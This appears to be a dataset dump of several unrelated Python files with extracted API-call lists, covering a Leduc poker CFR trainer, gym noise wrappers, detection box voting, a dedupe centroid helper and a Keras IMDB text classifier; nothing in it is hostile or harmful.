range(self.NUM_ACTIONS)], dtype=float) for assume_history, po_ in self.infoSets_dict[infoSet].items(): for ai in node.possible_action: nextHistory = assume_history + self.ACTION_DICT[ai] br_value[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, po_) action_value[ai] += br_value[ai] * po_ #br_action = 0 ← action 0 を全てのノードで選択できるわけではないため不適切 br_action = node.possible_action[0] for ai in node.possible_action: if action_value[ai] > action_value[br_action]: br_action = ai best_response_strategy[infoSet] = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) best_response_strategy[infoSet][br_action] = 1.0 node_util = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) for ai in node.possible_action: nextHistory = history + self.ACTION_DICT[ai] node_util[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob) best_response_util = 0 for ai in node.possible_action: best_response_util += node_util[ai] * best_response_strategy[infoSet][ai] return best_response_util else: avg_strategy = node.Get_average_information_set_mixed_strategy() nodeUtil = 0 action_value_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float) for ai in node.possible_action: nextHistory = history + self.ACTION_DICT[ai] action_value_list[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob*avg_strategy[ai]) nodeUtil += avg_strategy[ai] * action_value_list[ai] return nodeUtil def create_infoSets(self, history, target_player, po): player = self.action_player(history) if self.whether_terminal_states(history): return elif self.whether_chance_node(history): #round1 if len(history) == 0: cards = self.card_distribution() cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS)] for cards_candicates_i in cards_candicates: nextHistory = "".join(cards_candicates_i[:self.NUM_PLAYERS]) self.create_infoSets(nextHistory, target_player, po*(1/len(cards_candicates))) return #round2 else: com_cards_candicates = self.card_distribution() for player_i in range(self.NUM_PLAYERS): com_cards_candicates.remove(history[player_i]) for com_cards_i in com_cards_candicates: nextHistory = history + com_cards_i self.create_infoSets(nextHistory, target_player, po*(1/len(com_cards_candicates))) return infoSet = history[player] + history[self.NUM_PLAYERS:] if player == target_player: if self.infoSets_dict.get(infoSet) is None: self.infoSets_dict[infoSet] = defaultdict(int) self.infoSets_dict[infoSet][history] += po node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet) for ai in node.possible_action: nextHistory = history + self.ACTION_DICT[ai] if player == target_player: self.create_infoSets(nextHistory, target_player, po) else: actionProb = node.Get_average_information_set_mixed_strategy()[ai] self.create_infoSets(nextHistory, target_player, po*actionProb) def get_exploitability_dfs(self): # 各information setを作成 & reach_probabilityを計算 self.infoSets_dict = {} for target_player in range(self.NUM_PLAYERS): self.create_infoSets("", target_player, 1.0) exploitability = 0 best_response_strategy = {} for best_response_player_i in range(self.NUM_PLAYERS): exploitability += self.calc_best_response_value(best_response_strategy, best_response_player_i, "", 1) assert exploitability >= 0 return exploitability #config algorithm_candicates = ["vanilla_CFR", "chance_sampling_CFR", "external_sampling_MCCFR", "outcome_sampling_MCCFR"] algo = algorithm_candicates[1] train_iterations = 10**5 num_players = 2 wandb_save = True if wandb_save: wandb.init(project="Leduc_Poker_{}players".format(num_players), name="cfr_{}".format(algo)) #train leduc_trainer = LeducTrainer(train_iterations=train_iterations, num_players=num_players) leduc_trainer.train(algo) print("avg util:", leduc_trainer.eval_strategy(0)) pd.set_option('display.max_rows', None) result_dict = {} for key, value in sorted(leduc_trainer.nodeMap.items()): result_dict[key] = value.Get_average_information_set_mixed_strategy() df = pd.DataFrame(result_dict.values(), index=result_dict.keys(), columns=["Fold", "Call", "Raise"]) df.index.name = "Node" print(df) # calculate random strategy_profile exploitability for i in range(2,3): kuhn_poker_agent = LeducTrainer(train_iterations=0, num_players=i) print("{}player game:".format(i), kuhn_poker_agent.get_exploitability_dfs()) doctest.testmod()
[ "matplotlib.pyplot.xscale", "wandb.log", "matplotlib.pyplot.yscale", "random.shuffle", "matplotlib.pyplot.legend", "itertools.permutations", "collections.defaultdict", "numpy.array", "wandb.save", "matplotlib.pyplot.ylabel", "matplotlib.pyplot.xlabel", "pandas.set_option", "doctest.testmod" ]
[((32412, 32451), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', 'None'], {}), "('display.max_rows', None)\n", (32425, 32451), True, 'import pandas as pd\n'), ((32957, 32974), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (32972, 32974), False, 'import doctest\n'), ((3162, 3179), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3173, 3179), False, 'from collections import defaultdict\n'), ((25608, 25625), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""log"""'], {}), "('log')\n", (25618, 25625), True, 'import matplotlib.pyplot as plt\n'), ((25630, 25647), 'matplotlib.pyplot.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (25640, 25647), True, 'import matplotlib.pyplot as plt\n'), ((25652, 25676), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""iterations"""'], {}), "('iterations')\n", (25662, 25676), True, 'import matplotlib.pyplot as plt\n'), ((25681, 25709), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""exploitability"""'], {}), "('exploitability')\n", (25691, 25709), True, 'import matplotlib.pyplot as plt\n'), ((25714, 25742), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower left"""'}), "(loc='lower left')\n", (25724, 25742), True, 'import matplotlib.pyplot as plt\n'), ((1690, 1717), 'numpy.array', 'np.array', (['[1, 2]'], {'dtype': 'int'}), '([1, 2], dtype=int)\n', (1698, 1717), True, 'import numpy as np\n'), ((25770, 25782), 'wandb.save', 'wandb.save', ([], {}), '()\n', (25780, 25782), False, 'import wandb\n'), ((1782, 1812), 'numpy.array', 'np.array', (['[0, 1, 2]'], {'dtype': 'int'}), '([0, 1, 2], dtype=int)\n', (1790, 1812), True, 'import numpy as np\n'), ((30920, 30936), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (30931, 30936), False, 'from collections import defaultdict\n'), ((1876, 1903), 'numpy.array', 'np.array', (['[0, 1]'], {'dtype': 'int'}), '([0, 1], dtype=int)\n', (1884, 1903), True, 'import numpy as np\n'), ((15494, 15520), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (15508, 15520), False, 'import random\n'), ((19712, 19738), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (19726, 19738), False, 'import random\n'), ((21644, 21670), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (21658, 21670), False, 'import random\n'), ((25244, 25343), 'wandb.log', 'wandb.log', (["{'iteration': iteration_t, 'exploitability': self.exploitability_list[\n iteration_t]}"], {}), "({'iteration': iteration_t, 'exploitability': self.\n exploitability_list[iteration_t]})\n", (25253, 25343), False, 'import wandb\n'), ((17475, 17526), 'itertools.permutations', 'itertools.permutations', (['cards', '(self.NUM_PLAYERS + 1)'], {}), '(cards, self.NUM_PLAYERS + 1)\n', (17497, 17526), False, 'import itertools\n'), ((26703, 26750), 'itertools.permutations', 'itertools.permutations', (['cards', 'self.NUM_PLAYERS'], {}), '(cards, self.NUM_PLAYERS)\n', (26725, 26750), False, 'import itertools\n'), ((30070, 30117), 'itertools.permutations', 'itertools.permutations', (['cards', 'self.NUM_PLAYERS'], {}), '(cards, self.NUM_PLAYERS)\n', (30092, 30117), False, 'import itertools\n')]
import numpy as np class LossFunction: @staticmethod def calculate_cost(expected_value, predicted): raise NotImplementedError("Should have implemented this!") @staticmethod def calculate_cost_gradient(expected_value, outputs, derivative_outputs): raise NotImplementedError("Should have implemented this!") class MeanSquaredError(LossFunction): @staticmethod def calculate_cost(expected_value, outputs): return 0.5 * np.power(np.linalg.norm(expected_value - outputs), 2) @staticmethod def calculate_cost_gradient(expected_value, outputs, derivative_outputs): return (outputs - expected_value) * derivative_outputs
[ "numpy.linalg.norm" ]
[((478, 518), 'numpy.linalg.norm', 'np.linalg.norm', (['(expected_value - outputs)'], {}), '(expected_value - outputs)\n', (492, 518), True, 'import numpy as np\n')]
from dataclasses import dataclass @dataclass class Pool: param1: int @dataclass class HEPnOS: pools: list # metalgpy import numpy as np import metalgpy as mpy rng = np.random.RandomState(42) Pool_ = mpy.meta(Pool) HEPnOS_ = mpy.meta(HEPnOS) max_pools = 5 num_pools = mpy.Int(1, max_pools) pools = mpy.List([Pool_(param1=mpy.Int(0, 10)) for i in range(max_pools)], k=num_pools, invariant=True, name="pools") hepnos_app = HEPnOS_(pools) for sample_values, sample_app in mpy.sample(hepnos_app, size=2, rng=rng, deepcopy=True): instance = sample_app.evaluate() print(f"Frozen Program: {sample_app}") print(f"Program evaluation: {instance}") print()
[ "metalgpy.Int", "metalgpy.sample", "numpy.random.RandomState", "metalgpy.meta" ]
[((179, 204), 'numpy.random.RandomState', 'np.random.RandomState', (['(42)'], {}), '(42)\n', (200, 204), True, 'import numpy as np\n'), ((214, 228), 'metalgpy.meta', 'mpy.meta', (['Pool'], {}), '(Pool)\n', (222, 228), True, 'import metalgpy as mpy\n'), ((239, 255), 'metalgpy.meta', 'mpy.meta', (['HEPnOS'], {}), '(HEPnOS)\n', (247, 255), True, 'import metalgpy as mpy\n'), ((284, 305), 'metalgpy.Int', 'mpy.Int', (['(1)', 'max_pools'], {}), '(1, max_pools)\n', (291, 305), True, 'import metalgpy as mpy\n'), ((486, 540), 'metalgpy.sample', 'mpy.sample', (['hepnos_app'], {'size': '(2)', 'rng': 'rng', 'deepcopy': '(True)'}), '(hepnos_app, size=2, rng=rng, deepcopy=True)\n', (496, 540), True, 'import metalgpy as mpy\n'), ((337, 351), 'metalgpy.Int', 'mpy.Int', (['(0)', '(10)'], {}), '(0, 10)\n', (344, 351), True, 'import metalgpy as mpy\n')]
#!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = "<NAME>" import gym import numpy from gym.spaces.box import Box __all__ = ["NoisyObservationWrapper", "NoisyActionWrapper"] class NoisyObservationWrapper(gym.ObservationWrapper): """Make observation dynamic by adding noise""" def __init__(self, env: gym.Env = None, percent_pad=5, bottom_margin: int = 20): """ # doom 20px bottom is useless :param env: :param percent_pad: :param bottom_margin:""" super().__init__(env) self.original_shape = env.space.shape new_side = int(round(max(self.original_shape[:-1]) * 100.0 / (100.0 - percent_pad))) self.new_shape = [new_side, new_side, 3] self.observation_space = Box(0.0, 255.0, self.new_shape) self.bottom_margin = bottom_margin self.ob = None def _observation(self, obs: numpy.ndarray) -> numpy.ndarray: im_noise = numpy.random.randint(0, 256, self.new_shape).astype(obs.dtype) im_noise[: self.original_shape[0] - self.bottom_margin, : self.original_shape[1], :] = obs[ : -self.bottom_margin, :, : ] self.ob = im_noise return im_noise # def render(self, mode='human', close=False): # temp = self.env.render(mode, close) # return self.ob class NoisyActionWrapper(gym.ActionWrapper): """ TODO: finish Make action dynamic by adding noise""" def __init__(self, env: gym.Env = None, percent_pad=5, bottom_margin: int = 20): super().__init__(env) self.original_shape = env.space.shape new_side = int(round(max(self.original_shape[:-1]) * 100.0 / (100.0 - percent_pad))) self.new_shape = [new_side, new_side, 3] self.action_space = Box(0.0, 255.0, self.new_shape) self.bottom_margin = bottom_margin self.ob = None def _action(self, obs: numpy.ndarray) -> numpy.ndarray: im_noise = numpy.random.randint(0, 256, self.new_shape).astype(obs.dtype) im_noise[: self.original_shape[0] - self.bottom_margin, : self.original_shape[1], :] = obs[ : -self.bottom_margin, :, : ] self.ob = im_noise return im_noise # def render(self, mode='human', close=False): # temp = self.env.render(mode, close) # return self.ob
[ "gym.spaces.box.Box", "numpy.random.randint" ]
[((763, 794), 'gym.spaces.box.Box', 'Box', (['(0.0)', '(255.0)', 'self.new_shape'], {}), '(0.0, 255.0, self.new_shape)\n', (766, 794), False, 'from gym.spaces.box import Box\n'), ((1780, 1811), 'gym.spaces.box.Box', 'Box', (['(0.0)', '(255.0)', 'self.new_shape'], {}), '(0.0, 255.0, self.new_shape)\n', (1783, 1811), False, 'from gym.spaces.box import Box\n'), ((946, 990), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(256)', 'self.new_shape'], {}), '(0, 256, self.new_shape)\n', (966, 990), False, 'import numpy\n'), ((1958, 2002), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(256)', 'self.new_shape'], {}), '(0, 256, self.new_shape)\n', (1978, 2002), False, 'import numpy\n')]
import numpy as np DEBUG = True def py_box_voting_wrapper(IOU_thresh, score_thresh, with_nms): if with_nms: def _box_voting(nms_dets, dets): return box_voting_nms(nms_dets, dets, IOU_thresh, score_thresh) else: def _box_voting(dets): return box_voting(dets, IOU_thresh, score_thresh) return _box_voting def box_voting_nms(nms_dets, dets, IOU_thresh, score_thresh): """ greedily select boxes with high confidence and overlap with current maximum and voting the final box coordinates by fusing those boxes :param num_dets: dets after nms :param dets: original detection results, dets before nms. [[x1, y1, x2, y2 score]] :param IOU_thresh: retain overlap > IOU_thresh for fusion :param score_thresh: retain score > score_thresh for fusion :return: detection coordinates to keep """ x1 = dets[:, 0] y1 = dets[:, 1] x2 = dets[:, 2] y2 = dets[:, 3] scores = dets[:, 4] areas = (x2 - x1 + 1) * (y2 - y1 + 1) order = scores.argsort()[::-1] if DEBUG: print("dets ordered:", dets[order]) keep_fusion_boxes = [] for idx, nms_det in enumerate(nms_dets): area_nms_det = (nms_det[2] - nms_det[0] + 1) * (nms_det[3] - nms_det[1] + 1) xx1 = np.maximum(nms_det[0], x1[order]) yy1 = np.maximum(nms_det[1], y1[order]) xx2 = np.minimum(nms_det[2], x2[order]) yy2 = np.minimum(nms_det[3], y2[order]) # compute overlap w = np.maximum(0.0, xx2 - xx1 + 1) h = np.maximum(0.0, yy2 - yy1 + 1) inter = w * h ovr = inter / (area_nms_det + areas[order] - inter) # retain boxes with large overlap and high confidence for fusion IOU_inds_keep = np.where(ovr > IOU_thresh)[0] scores_inds_keep = np.where(scores[order] > score_thresh)[0] if DEBUG: print("IOU_inds_keep:", IOU_inds_keep) print("scores_inds_keep:", scores_inds_keep) inds_fusion = np.intersect1d(IOU_inds_keep, scores_inds_keep) if inds_fusion.size == 0: # if no box retained, keep the original one keep_fusion_boxes.append(nms_det) if DEBUG: print("inds_fusion:", inds_fusion) print("keep nms_det") continue if DEBUG: if inds_fusion.size>1: print("boxes for fusion:", inds_fusion) print(dets[order[inds_fusion]]) x1_fusion = x1[order[inds_fusion]] y1_fusion = y1[order[inds_fusion]] x2_fusion = x2[order[inds_fusion]] y2_fusion = y2[order[inds_fusion]] scores_fusion = scores[order[inds_fusion]] fusion_box = np.zeros((5)) fusion_box[0] = np.sum(x1_fusion * scores_fusion) / np.sum(scores_fusion) fusion_box[1] = np.sum(y1_fusion * scores_fusion) / np.sum(scores_fusion) fusion_box[2] = np.sum(x2_fusion * scores_fusion) / np.sum(scores_fusion) fusion_box[3] = np.sum(y2_fusion * scores_fusion) / np.sum(scores_fusion) fusion_box[4] = scores_fusion[0] if DEBUG: print("fusion_box:", fusion_box) keep_fusion_boxes.append(fusion_box) # boxes with small overlap are kept for another loop inds_next = np.where(ovr <= IOU_thresh)[0] order = order[inds_next] keep_fusion_boxes = np.array(keep_fusion_boxes) return keep_fusion_boxes def box_voting(dets, IOU_thresh, score_thresh): """ greedily select boxes with high confidence and overlap with current maximum and voting the final box coordinates by fusing those boxes :param num_dets: dets after nms :param dets: original detection results, dets before nms. [[x1, y1, x2, y2 score]] :param IOU_thresh: retain overlap > IOU_thresh for fusion :param score_thresh: retain score > score_thresh for fusion :return: detection coordinates to keep """ x1 = dets[:, 0] y1 = dets[:, 1] x2 = dets[:, 2] y2 = dets[:, 3] scores = dets[:, 4] areas = (x2 - x1 + 1) * (y2 - y1 + 1) order = scores.argsort()[::-1] if DEBUG: print("dets ordered:", dets) keep_fusion_boxes = [] while order.size > 0: i = order[0] xx1 = np.maximum(x1[i], x1[order]) yy1 = np.maximum(y1[i], y1[order]) xx2 = np.minimum(x2[i], x2[order]) yy2 = np.minimum(y2[i], y2[order]) # compute overlap w = np.maximum(0.0, xx2 - xx1 + 1) h = np.maximum(0.0, yy2 - yy1 + 1) inter = w * h ovr = inter / (areas[i]+ areas[order] - inter) # retain boxes with large overlap and high confidence for fusion IOU_inds_keep = np.where(ovr > IOU_thresh)[0] scores_inds_keep = np.where(scores[order] > score_thresh)[0] if DEBUG: print("IOU_inds_keep:", IOU_inds_keep) print("scores_inds_keep:", scores_inds_keep) if IOU_inds_keep.size == 0 or scores_inds_keep.size == 0: # if no box retained, keep the original one keep_fusion_boxes.append(dets[i]) if DEBUG: print("keep original det") continue inds_fusion = np.intersect1d(IOU_inds_keep, scores_inds_keep) if DEBUG: if inds_fusion.size>1: print("boxes for fusion:", inds_fusion) print(dets[order[inds_fusion]]) x1_fusion = x1[order[inds_fusion]] y1_fusion = y1[order[inds_fusion]] x2_fusion = x2[order[inds_fusion]] y2_fusion = y2[order[inds_fusion]] scores_fusion = scores[order[inds_fusion]] fusion_box = np.zeros((1,5)) fusion_box[0][0] = np.sum(x1_fusion * scores_fusion) / np.sum(scores_fusion) fusion_box[0][1] = np.sum(y1_fusion * scores_fusion) / np.sum(scores_fusion) fusion_box[0][2] = np.sum(x2_fusion * scores_fusion) / np.sum(scores_fusion) fusion_box[0][3] = np.sum(y2_fusion * scores_fusion) / np.sum(scores_fusion) fusion_box[0][4] = scores_fusion[0] if DEBUG: print("fusion_box:", fusion_box) keep_fusion_boxes.append(fusion_box) # boxes with small overlap are kept for another loop inds_next = np.where(ovr <= IOU_thresh)[0] order = order[inds_next] keep_fusion_boxes = np.array(keep_fusion_boxes) return keep_fusion_boxes
[ "numpy.minimum", "numpy.maximum", "numpy.sum", "numpy.zeros", "numpy.where", "numpy.array", "numpy.intersect1d" ]
[((3374, 3401), 'numpy.array', 'np.array', (['keep_fusion_boxes'], {}), '(keep_fusion_boxes)\n', (3382, 3401), True, 'import numpy as np\n'), ((6324, 6351), 'numpy.array', 'np.array', (['keep_fusion_boxes'], {}), '(keep_fusion_boxes)\n', (6332, 6351), True, 'import numpy as np\n'), ((1285, 1318), 'numpy.maximum', 'np.maximum', (['nms_det[0]', 'x1[order]'], {}), '(nms_det[0], x1[order])\n', (1295, 1318), True, 'import numpy as np\n'), ((1333, 1366), 'numpy.maximum', 'np.maximum', (['nms_det[1]', 'y1[order]'], {}), '(nms_det[1], y1[order])\n', (1343, 1366), True, 'import numpy as np\n'), ((1381, 1414), 'numpy.minimum', 'np.minimum', (['nms_det[2]', 'x2[order]'], {}), '(nms_det[2], x2[order])\n', (1391, 1414), True, 'import numpy as np\n'), ((1429, 1462), 'numpy.minimum', 'np.minimum', (['nms_det[3]', 'y2[order]'], {}), '(nms_det[3], y2[order])\n', (1439, 1462), True, 'import numpy as np\n'), ((1502, 1532), 'numpy.maximum', 'np.maximum', (['(0.0)', '(xx2 - xx1 + 1)'], {}), '(0.0, xx2 - xx1 + 1)\n', (1512, 1532), True, 'import numpy as np\n'), ((1545, 1575), 'numpy.maximum', 'np.maximum', (['(0.0)', '(yy2 - yy1 + 1)'], {}), '(0.0, yy2 - yy1 + 1)\n', (1555, 1575), True, 'import numpy as np\n'), ((2004, 2051), 'numpy.intersect1d', 'np.intersect1d', (['IOU_inds_keep', 'scores_inds_keep'], {}), '(IOU_inds_keep, scores_inds_keep)\n', (2018, 2051), True, 'import numpy as np\n'), ((2711, 2722), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (2719, 2722), True, 'import numpy as np\n'), ((4257, 4285), 'numpy.maximum', 'np.maximum', (['x1[i]', 'x1[order]'], {}), '(x1[i], x1[order])\n', (4267, 4285), True, 'import numpy as np\n'), ((4300, 4328), 'numpy.maximum', 'np.maximum', (['y1[i]', 'y1[order]'], {}), '(y1[i], y1[order])\n', (4310, 4328), True, 'import numpy as np\n'), ((4343, 4371), 'numpy.minimum', 'np.minimum', (['x2[i]', 'x2[order]'], {}), '(x2[i], x2[order])\n', (4353, 4371), True, 'import numpy as np\n'), ((4386, 4414), 'numpy.minimum', 'np.minimum', (['y2[i]', 'y2[order]'], {}), '(y2[i], y2[order])\n', (4396, 4414), True, 'import numpy as np\n'), ((4454, 4484), 'numpy.maximum', 'np.maximum', (['(0.0)', '(xx2 - xx1 + 1)'], {}), '(0.0, xx2 - xx1 + 1)\n', (4464, 4484), True, 'import numpy as np\n'), ((4497, 4527), 'numpy.maximum', 'np.maximum', (['(0.0)', '(yy2 - yy1 + 1)'], {}), '(0.0, yy2 - yy1 + 1)\n', (4507, 4527), True, 'import numpy as np\n'), ((5194, 5241), 'numpy.intersect1d', 'np.intersect1d', (['IOU_inds_keep', 'scores_inds_keep'], {}), '(IOU_inds_keep, scores_inds_keep)\n', (5208, 5241), True, 'import numpy as np\n'), ((5644, 5660), 'numpy.zeros', 'np.zeros', (['(1, 5)'], {}), '((1, 5))\n', (5652, 5660), True, 'import numpy as np\n'), ((1756, 1782), 'numpy.where', 'np.where', (['(ovr > IOU_thresh)'], {}), '(ovr > IOU_thresh)\n', (1764, 1782), True, 'import numpy as np\n'), ((1813, 1851), 'numpy.where', 'np.where', (['(scores[order] > score_thresh)'], {}), '(scores[order] > score_thresh)\n', (1821, 1851), True, 'import numpy as np\n'), ((2749, 2782), 'numpy.sum', 'np.sum', (['(x1_fusion * scores_fusion)'], {}), '(x1_fusion * scores_fusion)\n', (2755, 2782), True, 'import numpy as np\n'), ((2785, 2806), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2791, 2806), True, 'import numpy as np\n'), ((2831, 2864), 'numpy.sum', 'np.sum', (['(y1_fusion * scores_fusion)'], {}), '(y1_fusion * scores_fusion)\n', (2837, 2864), True, 'import numpy as np\n'), ((2867, 2888), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2873, 2888), True, 'import numpy as np\n'), ((2913, 2946), 'numpy.sum', 'np.sum', (['(x2_fusion * scores_fusion)'], {}), '(x2_fusion * scores_fusion)\n', (2919, 2946), True, 'import numpy as np\n'), ((2949, 2970), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2955, 2970), True, 'import numpy as np\n'), ((2995, 3028), 'numpy.sum', 'np.sum', (['(y2_fusion * scores_fusion)'], {}), '(y2_fusion * scores_fusion)\n', (3001, 3028), True, 'import numpy as np\n'), ((3031, 3052), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (3037, 3052), True, 'import numpy as np\n'), ((3285, 3312), 'numpy.where', 'np.where', (['(ovr <= IOU_thresh)'], {}), '(ovr <= IOU_thresh)\n', (3293, 3312), True, 'import numpy as np\n'), ((4703, 4729), 'numpy.where', 'np.where', (['(ovr > IOU_thresh)'], {}), '(ovr > IOU_thresh)\n', (4711, 4729), True, 'import numpy as np\n'), ((4760, 4798), 'numpy.where', 'np.where', (['(scores[order] > score_thresh)'], {}), '(scores[order] > score_thresh)\n', (4768, 4798), True, 'import numpy as np\n'), ((5687, 5720), 'numpy.sum', 'np.sum', (['(x1_fusion * scores_fusion)'], {}), '(x1_fusion * scores_fusion)\n', (5693, 5720), True, 'import numpy as np\n'), ((5723, 5744), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5729, 5744), True, 'import numpy as np\n'), ((5772, 5805), 'numpy.sum', 'np.sum', (['(y1_fusion * scores_fusion)'], {}), '(y1_fusion * scores_fusion)\n', (5778, 5805), True, 'import numpy as np\n'), ((5808, 5829), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5814, 5829), True, 'import numpy as np\n'), ((5857, 5890), 'numpy.sum', 'np.sum', (['(x2_fusion * scores_fusion)'], {}), '(x2_fusion * scores_fusion)\n', (5863, 5890), True, 'import numpy as np\n'), ((5893, 5914), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5899, 5914), True, 'import numpy as np\n'), ((5942, 5975), 'numpy.sum', 'np.sum', (['(y2_fusion * scores_fusion)'], {}), '(y2_fusion * scores_fusion)\n', (5948, 5975), True, 'import numpy as np\n'), ((5978, 5999), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5984, 5999), True, 'import numpy as np\n'), ((6235, 6262), 'numpy.where', 'np.where', (['(ovr <= IOU_thresh)'], {}), '(ovr <= IOU_thresh)\n', (6243, 6262), True, 'import numpy as np\n')]
import numpy from dedupe.distance.affinegap import normalizedAffineGapDistance as comparator def getCentroid(attribute_variants, comparator): """ Takes in a list of attribute values for a field, evaluates the centroid using the comparator, & returns the centroid (i.e. the 'best' value for the field) """ n = len(attribute_variants) distance_matrix = numpy.zeros([n,n]) # populate distance matrix by looping through elements of matrix triangle for i in range (0,n): for j in range (0, i): distance = comparator(attribute_variants[i], attribute_variants[j]) distance_matrix[i,j] = distance_matrix[j,i] = distance average_distance = distance_matrix.mean(0) # there can be ties for minimum, average distance string min_dist_indices = numpy.where(average_distance==average_distance.min())[0] if len(min_dist_indices) > 1: centroid = breakCentroidTie(attribute_variants, min_dist_indices) else : centroid_index = min_dist_indices[0] centroid = attribute_variants[centroid_index] return centroid def breakCentroidTie(attribute_variants, min_dist_indices): """ Finds centroid when there are multiple values w/ min avg distance (e.g. any dupe cluster of 2) right now this selects the first among a set of ties, but can be modified to break ties in strings by selecting the longest string """ return attribute_variants[min_dist_indices[0]] def getCanonicalRep(record_cluster): """ Given a list of records within a duplicate cluster, constructs a canonical representation of the cluster by finding canonical values for each field """ canonical_rep = {} for key in record_cluster[0].keys(): key_values = [] for record in record_cluster : # assume non-empty values always better than empty value for canonical record if record[key]: key_values.append(record[key]) if key_values: canonical_rep[key] = getCentroid(key_values, comparator) else: canonical_rep[key] = '' return canonical_rep
[ "dedupe.distance.affinegap.normalizedAffineGapDistance", "numpy.zeros" ]
[((391, 410), 'numpy.zeros', 'numpy.zeros', (['[n, n]'], {}), '([n, n])\n', (402, 410), False, 'import numpy\n'), ((573, 629), 'dedupe.distance.affinegap.normalizedAffineGapDistance', 'comparator', (['attribute_variants[i]', 'attribute_variants[j]'], {}), '(attribute_variants[i], attribute_variants[j])\n', (583, 629), True, 'from dedupe.distance.affinegap import normalizedAffineGapDistance as comparator\n')]
'''This example demonstrates the use of Convolution1D for text classification. Gets to 0.89 test accuracy after 2 epochs. 90s/epoch on Intel i5 2.4Ghz CPU. 10s/epoch on Tesla K40 GPU. ''' from __future__ import print_function import numpy as np import keras.callbacks from keras.preprocessing import sequence from keras.models import Sequential from keras.layers import Dense, Dropout, Activation from keras.layers import Embedding from keras.layers import Conv1D, GlobalMaxPooling1D from keras.datasets import imdb from example_correctness_test_utils import TrainingHistory, StopwatchManager # set parameters: max_features = 5000 maxlen = 400 batch_size = 32 embedding_dims = 50 filters = 250 kernel_size = 3 hidden_dims = 250 epochs = 2 print('Loading data...') (x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features) train_input_truncation = 1500 test_input_truncation = 200 x_train = x_train[:train_input_truncation] y_train = y_train[:train_input_truncation] x_test = x_test[:test_input_truncation] y_test = y_test[:test_input_truncation] print(len(x_train), 'train sequences') print(len(x_test), 'test sequences') print('Pad sequences (samples x time)') x_train = sequence.pad_sequences(x_train, maxlen=maxlen) x_test = sequence.pad_sequences(x_test, maxlen=maxlen) print('x_train shape:', x_train.shape) print('x_test shape:', x_test.shape) print('Build model...') model = Sequential() # we start off with an efficient embedding layer which maps # our vocab indices into embedding_dims dimensions model.add(Embedding(max_features, embedding_dims, input_length=maxlen)) model.add(Dropout(0.2)) # we add a Convolution1D, which will learn filters # word group filters of size filter_length: model.add(Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1)) # we use max pooling: model.add(GlobalMaxPooling1D()) # We add a vanilla hidden layer: model.add(Dense(hidden_dims)) model.add(Dropout(0.2)) model.add(Activation('relu')) # We project onto a single unit output layer, and squash it with a sigmoid: model.add(Dense(1)) model.add(Activation('sigmoid')) history = TrainingHistory() sw_manager = StopwatchManager(stop_watch, compile_stop_watch) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_data=(x_test, y_test), callbacks=[history, sw_manager]) output.contents = np.array([history.acc, history.loss, history.val_acc, history.val_loss])
[ "example_correctness_test_utils.TrainingHistory", "keras.layers.Activation", "keras.preprocessing.sequence.pad_sequences", "keras.layers.Dropout", "keras.layers.Conv1D", "example_correctness_test_utils.StopwatchManager", "keras.layers.Dense", "numpy.array", "keras.layers.Embedding", "keras.models.Sequential", "keras.layers.GlobalMaxPooling1D", "keras.datasets.imdb.load_data" ]
[((809, 847), 'keras.datasets.imdb.load_data', 'imdb.load_data', ([], {'num_words': 'max_features'}), '(num_words=max_features)\n', (823, 847), False, 'from keras.datasets import imdb\n'), ((1201, 1247), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['x_train'], {'maxlen': 'maxlen'}), '(x_train, maxlen=maxlen)\n', (1223, 1247), False, 'from keras.preprocessing import sequence\n'), ((1257, 1302), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['x_test'], {'maxlen': 'maxlen'}), '(x_test, maxlen=maxlen)\n', (1279, 1302), False, 'from keras.preprocessing import sequence\n'), ((1412, 1424), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1422, 1424), False, 'from keras.models import Sequential\n'), ((2129, 2146), 'example_correctness_test_utils.TrainingHistory', 'TrainingHistory', ([], {}), '()\n', (2144, 2146), False, 'from example_correctness_test_utils import TrainingHistory, StopwatchManager\n'), ((2160, 2208), 'example_correctness_test_utils.StopwatchManager', 'StopwatchManager', (['stop_watch', 'compile_stop_watch'], {}), '(stop_watch, compile_stop_watch)\n', (2176, 2208), False, 'from 